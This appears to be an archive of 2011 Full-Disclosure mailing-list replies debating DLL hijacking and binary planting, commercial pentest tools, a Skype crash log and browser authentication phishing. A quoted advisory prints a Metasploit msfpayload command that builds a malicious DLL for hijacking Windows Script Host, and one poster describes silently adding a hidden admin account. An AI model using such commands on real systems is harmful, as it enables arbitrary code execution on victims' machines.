I don't think it's supposed to be a secret. There are also references to Insect Pro in the source code: https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java BTW, you gotta love the scanner :) https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java On Tue, Oct 4, 2011 at 9:31 PM, Justin Klein Keane jus...@madirish.netwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 insecurityresearch.com (the Insect PRO site) does in fact seem to redirect to exploitpack.com - nice catch Chris. Justin Klein Keane http://www.MadIrish.net The digital signature on this e-mail may be confirmed using the PGP key located at: http://www.madirish.net/gpgkey On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote: So this is from the same people that developed Insect Pro? Chris On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk6LXyQACgkQkSlsbLsN1gDTAwb/U8PFg04A1Te4LywChw0tMQeG IZZf1wc3Uo0SVYoTxRjRgCfYKyLNaAgt2jvpxoaj2RlJssU/Conj7mBNXc1if3yj Jx+i2uKWUs0PMxU3reze5/xLrAL1avXAlpSeM9/9WO1hHeW/s7NTQUnMIRtnDwhT TII1euY67LuyQUqsK7LhShVZEK2uCu3pmIS3SIxTJKATXmo1UtU2VYxvnfLSVD8+ KwxL166Q20Xhyd4+i+u5buOGARm3vOO5d3wiN8hEuNXSJXM4v6dswUaR1y4Zx9U6 3PrlNE7PDDdjWHj2mcA= =zyNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Twitter URL spoofing still exploitable
On Tue, Sep 27, 2011 at 3:26 PM, Dan Kaminsky d...@doxpara.com wrote: Ok, now nobody can spoof a URL, but how come a user will tell good URLs and bad ones apart? Oh boy! Wherever did you get the idea that users can do this? Jokes apart, I do find it annoying that URLs aren't expanded automatically anymore. But I don't expect this situation to be permanent. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
This is a bit old (2007) but it shows this kind of bug perfectly well. http://securitytracker.com/id/1018588 So I can imagine one scenario in which DLL hijacking would make sense - if the developers neglected to properly set the directory permissions and it got reported as a vuln, the patch *could* have been to properly set the permissions on *files* and forget to set them on the directory. It'd be an extremely stupid way to patch. Then again, it's an extremely stupid bug to begin with, so... :) On Mon, Sep 26, 2011 at 3:36 AM, Thor (Hammer of God) t...@hammerofgod.comwrote: You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.comcrazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com t...@hammerofgod.com wrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.comkz2...@googlemail.com kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.ukfull-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.comsecurity-bas...@securityfocus.com security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Paul, Those file extensions correspond to scripts. If a file contains a script that runs when the file is double clicked, and the scripting engine is not sandboxed (meaning the script can do the same things an executable file can do) then the attack is meaningless. You can simply have the script inside the file do malicious things instead of planting a DLL. Binary planting, regardless of the discussion about it being a vulnerability or not, in any case only makes sense when the file only contains static data, or when the file contains executable code that would normally not have the same privileges as a standard executable file. (A script that doesn't get executed when double clicking on it -for example if a text editor is opened instead- would be the same case as in a data file). I've never used .js or .jse scripts on Windows, but all the other extensions are patently not sandboxed scripts. In fact, the Windows Script Host software is mostly used to write system maintenance scripts, so it's obvious its scripts can't be restricted or they'd be useless. I'm guessing the same applies to .js and .jse then, and of course I wouldn't mind seeing proof that it doesn't. However the links you provided don't really prove anything (the first one even says this is not a complete list, and I admit I've only glanced the second one but it seems unrelated, as it applies to file transfers on Microsoft Sharepoint). Planting a DLL file to be executed at the same time as other executable file is just a convoluted way of doing the same thing. It *may* be used in some strange, artificial situations, but I'm not convinced there aren't better ways to do it, and in any case it doesn't justify an advisory. And judging from what the timeline reads, I believe Microsoft simply ignored this one. I hope my explanation helped :) -Mario On Mon, Sep 5, 2011 at 12:54 AM, paul.sz...@sydney.edu.au wrote: Application: wscript.exe Extensions: js, jse, vbe, vbs, wsf, wsh Library: wshesn.dll Many people commented that the above extensions are executable already, so are (should be) treated with caution, or that they can be trojaned directly without any DLL load shenanigans. However... looking at http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx I do not see JS listed as executable, though JSE is listed. Looking at http://msdn.microsoft.com/en-us/library/ms722429.aspx I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP machine, none of the above extensions are designated. Maybe DLL hijacking is useful for some of these file types, after all? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
On Mon, Sep 5, 2011 at 7:45 PM, root ro...@fibertel.com.ar wrote: Off-topic: First Insect PRO, and now this? What's happening fellow Latin-americans? our standards are falling. Please behave, this is the Internet! [image: The_Internet_is_Serious_Business - Low.jpg] -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” The_Internet_is_Serious_Business - Low.jpg___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Are you guys seriously reporting that double clicking on a malicious .vbs file could lead to remote code execution? :P Either I'm missing something (and I'd welcome a rebuttal here!) or you might as well add .exe to that list. All those extensions are already executable. On Fri, Sep 2, 2011 at 7:35 PM, CYBSEC Labs cybsecl...@cybsec.com wrote: ** Advisory Name: Windows Script Host DLL Hijacking Internal Cybsec Advisory Id: 2011-0901-Windows Script Host DLL Hijacking Vulnerability Class: Remote Command Execution Vulnerability Release Date: September 2, 2011 Affected Applications: Windows Script Host v5.6; other versions may also be affected Affected Platforms: Any running Windows Script Host v5.6 Local / Remote: Remote / Local Severity: High – CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) Researcher: Juan Manuel Garcia Vendor Status: Acknowedged Reference to Vulnerability Disclosure Policy : http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: DLL Hijacking takes advantage of the way an application dynamically loads dll libraries without specifying a fully qualified path. This is usually done invoking the LoadLibrary and LoadLibraryEx functions to dynamically load DLLs. In order to exploit this vulnerability a user must open a file with an extension associated to the vulnerable application. A malicious dll, named exactly as a dll the apllications loads using the vulnerable function, must be placed in the same directory as the opened file. The application will then load the malicious dll instead of the original, thus executing the malicious code. The following application loads external libraries following an insufficiently qualified path. Application: wscript.exe Extensions: js, jse, vbe, vbs, wsf, wsh Library: wshesn.dll Exploit: Option 1 - Using the “msfpayload” Metasploit module as shown below: msfpayload windows/exec CMD=calc.exe D exploit.dll Option 2 - Using the “webdav_dll_hijacker” Metasploit module. Impact: A successful exploit of this vulnerability leads to arbitrary code execution. Vendor Response: 2011/08/09 – Vulnerability was identified. 2011/08/19 – Cybsec sent detailed information on the issue and a Proof of Concept. 2011/08/19 – Vendor stated: “As a matter of policy, we cannot comment on ongoing investigations”. 2011/08/19 – Vendor was informed that the security advisory would be published after 15 days. 2011/09/02 – Vulnerability was released. Contact Information: For more information regarding the vulnerability feel free to contact the researcher at jmgarcia at cybsec dot com About CYBSEC S.A. Security Systems Since 1996, CYBSEC is engaged exclusively in rendering professional services specialized in Information Security. Their area of services covers Latin America, Spain and over 250 customers are a proof of their professional life. To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange. For more information, please visit www.cybsec.com (c) 2011 - CYBSEC S.A. Security Systems ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
If it's a trusted .vbs then how would you drop a .dll in the same directory? If you have write permissions it's easier to just modify the .vbs. You might as well claim the added value is to backdoor a .vbs file subrepticiously so it doesn't show when inspecting the source code. But it doesn't add that much, really, since a new and misterious .dll file would also draw the attention, so it's probably easier to hide malicious intent into the source code by obfuscating it. On Fri, Sep 2, 2011 at 11:53 PM, Nahuel Grisolia nah...@bonsai-sec.comwrote: List, On 09/02/2011 06:45 PM, root wrote: You don't get the worst part: unsuccessful exploitation also leads to code execution. Scary stuff. On 09/02/2011 05:05 PM, Mario Vilas wrote: Are you guys seriously reporting that double clicking on a malicious .vbs file could lead to remote code execution? :P Either I'm missing something (and I'd welcome a rebuttal here!) or you might as well add .exe to that list. All those extensions are already executable. I think that they're talking about that executing a trusted vbs could lead to the execution of malicious code. :S regards, -- Nahuel Grisolia - C|EH Information Security Consultant Bonsai Information Security Project Leader http://www.bonsai-sec.com/ (+54-11) 4777-3107 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
I disagree. If this so called vulnerability had any added value in terms of social engineering, it would actually make sense to report it. Social engineering isn't bad, I really don't care how leet it is. My claim is simpler: this advisory makes no sense at all, because it replaces an easy way of exploitation for a hard way of exploitation, so its added value is actually *negative* for the attacker. Most likely whoever found this is new in the infosec world and never stopped to consider this details - he/she just blindly repeated what the dll injection crowd was doing and posted whatever results were found, without understanding really well what was going on. And THAT is the state of infosec today. People who report stuff for the sake of reporting, without really understanding how things work or why. On Fri, Sep 2, 2011 at 11:46 PM, valdis.kletni...@vt.edu wrote: On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said: LOL. Warning, if you get the user to execute code, then it is possible to get the user to execute code!! All you have to do is get files on their system, and then get them to execute those files! Note that once you get the user to execute the code, it will actually run in the context of that user!! This is remote code execution vulnerability! Welcome to today's Infosec! The sad part is that this is the future of infosec as well. Microsoft got the security religion a few years back, and even I have to admit their current stuff isn't that bad at all. The various Linux distros are (slowly) getting their acts together, and maybe even Apple and Adobe will see the light sometime reasonably soon. Yes, there will still be software failures - but once the effort of finding a new 0-day reaches a certain point, the economics change And once that happens, social engineering will become an even bigger part of both the attack and defense sides of infosec. For the black hats, the cost/ benefit of looking for effective 0-day holes will continue to drop, while the cost/benefit of phishing a user will remain steady - so that's a push towards more social engineering. Why go to the effort of spending 3 months finding a browser bug that allows you to push malware to the victim's machine, when you can just spend 45 minutes creating a Your machine is infected - click here to fix it pop-up that will catch 80% of the people? Meanwhile, as the software gets more hardened and patching is more automated, the white hats will find a bigger percent of their time is spent defending their systems from attacks triggered by their own users. Because the failure rate of people's brains is already about 4.7*10**9 times as high as the software failure rate, and the ratio is only getting worse - software is improving, people aren't. Prediction 1: 10 years from now, organized crime will be hiring cognitive psychologists to help design more effective phish the way they currently hire programmers to write better spambots. Prediction 2: It ain't gonna get better till the average IQ starts going up faster than the software improves. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is smeone going to warez this... it aint free.. http://www.insecurityresearch.com/files/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Oh, and BTW... --- Violation Exception Log --- 0:034 g (f10.ed4): Unknown exception (first chance) (f10.ed4): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c07ca54b ebx=a96959bc ecx=d8f10db2 edx=155f esi=d7263481 edi=3e294540 eip=25c50116 esp=37f91000 ebp=50601616 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 25c50116 cd01int 1 0:000 !exchain 0018e8f8: Skype+8be3a0 (00cbe3a0) This doesn't look like an exploitable buffer overflow to me. I think you just stumbled upon Skype's anti-debug measures. On Tue, Aug 23, 2011 at 1:02 AM, Mario Vilas mvi...@gmail.com wrote: Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
Insect Pro - Now with an integrated 1.21 gigawatt Flux Capacitor! If you make a pentest at 88 miles per hour you can go back in time! On Wed, Aug 3, 2011 at 3:17 AM, root ro...@fibertel.com.ar wrote: Dude you just released INSECT Pro 2.7 less than a week ago. I swear to god I'm being serious. On 08/02/2011 08:48 PM, Juan Sacco wrote: INSECT Pro 2.6.1 is worldwide available right now Check the new cool features: http://www.youtube.com/watch?v=EcgPMyjHVbQ * Run Faster: Because to make a good security testing is not enough * Load Better: Major graphical interface and optimisation features were implemented * Module Search: This version includes a new built-in search feature * Improvements and Changes: Many more optimisations and updates were added * Lots of bugs were patched Start here: http://www.insecurityresearch.com Regards Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] URL Spoofing vulnerability in different browsers
Don't worry, we all know MustLive is lying, as usual. On Fri, Jul 22, 2011 at 10:08 PM, Chris Evans scarybea...@gmail.com wrote: On Fri, Jul 22, 2011 at 8:36 AM, MustLive mustl...@websecurity.com.ua wrote: Hello list! I want to warn you about URL Spoofing vulnerability in Mozilla Firefox, Internet Explorer, Google Chrome, Opera and other browsers. I found it long time ago, at 6th of February 2008, just after finding of built-in CSRF vulnerability in Mozilla and Firefox (it's funky CSRF attack via prefetching functionality), which I described at my site in March. - Affected products: - Vulnerable are all browsers which support Basic/Digest Authentication. It's all modern browsers and many from old browsers. In particular affected are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, Firefox 4.0b2 (and Mozilla and all other Gecko-based browsers), Internet Explorer 6, 7, 8, Google Chrome 1.0.154.48 and Opera 10.62 and previous and next versions of these browsers. And other browsers which support Basic/Digest Authentication. In March, after my informing, Mozilla opened Bug 647010 in Bugzilla (https://bugzilla.mozilla.org/show_bug.cgi?id=647010). Among four browsers developers informed by me only Mozilla said, that they are planning to fix this vulnerability (without specifying the time). Google even didn't answer me, but in June they informed in their blog (http://blog.chromium.org/2011/06/new-chromium-security-features-june.html), that they fixed this vulnerability in browsers Chrome 13 (it's now beta version) and higher. -- Details: -- This is better to call attack, then vulnerability, because it's using built-in browsers functionality (and its intended behavior) to attack users of web sites. This attack allows to conduct phishing attacks on users of web sites - in this case phishing is doing not at other (phishing) sites, not with using of holes of target sites (like reflected XSS or persistent XSS), but with using of browsers functionality (and allowed functionality of target sites to place external content). I called this attack as Onsite phishing (or Inline phishing). It can be used (including by phishers) for stealing of logins and passwords of users of web sites. As I've tested, a lot of different methods (with using of tags and CSS), which allow to make cross-site requests, can be used to conduct this attack. Except prefetching (in all Gecko-based browsers which support prefetching functionality), which doesn't show Authentication window at receiving of 401 response from web server. The next methods can be used: Tags img, script, iframe, frame, embed, link (css) - Mozilla, Firefox, IE, Google Chrome and Opera. Tag object - Internet Explorer, Google Chrome and Opera. CSS (inline, in html files, in external css files): such as -moz-binding:url - Mozilla and Firefox 3.0, such as background-image:url - in all browsers. Here are screenshots of the attack in different browsers (in Firefox 3.0.19, 3.5.x, 3.6.x. 4.0b2 the dialog window looks almost equally): http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Mozilla.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Firefox.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE6.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE7.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE8.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Chrome.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Opera.png The attack can be made as reflected at target site, as persistent (with using of allowed functionality at target site, which allows to put some tags, like img tag). The persistent attack is more dangerous (and such type of attack is showed on screenshots). And there are millions of web sites which allow such user generated content (like img tags) which can lead to such persistent attacks. Timeline: 2011.03.26 - announced at my site. 2011.03.31 - informed Mozilla, Microsoft, Google and Opera. 2011.04.01 - Mozilla answered and opened entry in Bugzilla (https://bugzilla.mozilla.org/show_bug.cgi?id=647010). 2011.04.01 - Microsoft answered and asked for more details. 2011.04.03 - gave additional details for Microsoft. But they ignored to fix, like Google and Opera did. 2011.06.14 - Google hiddenly and lamerly fixed this hole in Chrome 12 beta (and future versions), without answering and thanking me for informing. Which is lame behavior and I don't respect companies with such behavior. But this Google's step should force other browsers developers to fix this vulnerability in their products. FWIW -- no, Chrome Security Team does not operate that way, and you should be well aware of that! In case you weren't, please check out the Hall of Fame: http://dev.chromium.org/Home/chromium-security/hall-of-fame As can be seen, we have a long
Re: [Full-disclosure] Binary Planting Goes Any File Type
Actually you *can* launch an executable that way, if you add a couple more clicks afterwards, or you right click on the file and choose a non default menu option. It's no more ridiculous than any other social engineering that requires people to hit a hotkey they probably never heard of and browse all the way to your malicious file... IMHO what you're reporting is a great way to improve social engineering attacks. But you should flag it as such rather than calling it a 0day just for the sake of the fancy word. This is not a demerit of your work in any way, it's just a matter of using the proper vocabulary. On Sat, Jul 9, 2011 at 1:11 AM, Mitja Kolsek mitja.kol...@acrossecurity.com wrote: Ok, Dan, just for you: Launch Internet Explorer 9 on Windows 7 (probably other IE/Win works too), go to File-Open (or press Ctrl+O), browse to Test.html and open it. No double-clicking and you couldn't launch an executable this way. Better? Cheers, Mitja On Jul 8, 2011, at 9:10 PM, Dan Kaminsky d...@doxpara.com wrote: And here's where your exploit stops being one: === Suppose the current version of Apple Safari (5.0.5) is our default web browser. If we put the above files in the same directory (on a local drive or a remote share) and double-click Test.html, what happens is the following: === At this point, Test.html might actually be test.exe with the HTML icon embedded. Everything else then is unnecessary obfuscation -- code execution was already possible the start by design. This is a neat vector though, and it's likely that with a bit more work it could be turned into an actual RCE. On Fri, Jul 8, 2011 at 10:38 AM, ACROS Security Lists li...@acros.si wrote: We published a blog post on a nice twist to binary planting which we call File Planting. There'll be much more of this from us in the future, but here's the first sample for you to (hopefully) enjoy. http://blog.acrossecurity.com/2011/07/binary-planting-goes-any-file-type.html or http://bit.ly/nXmRFD Best regards, Mitja Kolsek CEOCTO ACROS, d.o.o. Makedonska ulica 113 SI - 2000 Maribor, Slovenia tel: +386 2 3000 280 fax: +386 2 3000 282 web: http://www.acrossecurity.com blg: http://blog.acrossecurity.com ACROS Security: Finding Your Digital Vulnerabilities Before Others Do ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release
Probably in fear that said attribution would kill the notion that they actually wrote the software they're trying to sell. IMHO, none of this ranting would happen if the tool had been free to begin with. It's a long lost cause now. On Thu, Jun 23, 2011 at 8:23 PM, root ro...@fibertel.com.ar wrote: Skipfish is Apache 2.0 and Metasploit is BSD. He don't even has to release the source. The only thing missing is attribution. On 06/23/2011 03:51 AM, Sergio 'shadown' Alvarez wrote: Juan, I've seen you are using Michal Zalewski's skipfish as engine, isn't it a license violation? Cheers, Sergio On Jun 23, 2011, at 3:16 AM, Juan Sacco wrote: Test your network security and audit your website using the same tools as hackers. INSECT Pro 2.6.1 is available for purchase right now worldwide through PayPal! * Run Faster: You not only want to make great security testing, you want a nice performance * Load Better: Major graphical interface and optimizations features * Module Search: Ever wondered where that module? We have a built-in search feature for you * Improvements, and Changes As always, we've added a lot of other features and optimizations * The latest exploits found in the wild We are always trying to be one step ahead of the competition, take a visual tour of some of INSECT Pro most popular features and discover INSECT Pro today! Start here: http://www.insecurityresearch.com Regards Juan Sacco -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com INSECT Pro 2.6.1 on track - Stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google chrome sending strange DNS queries
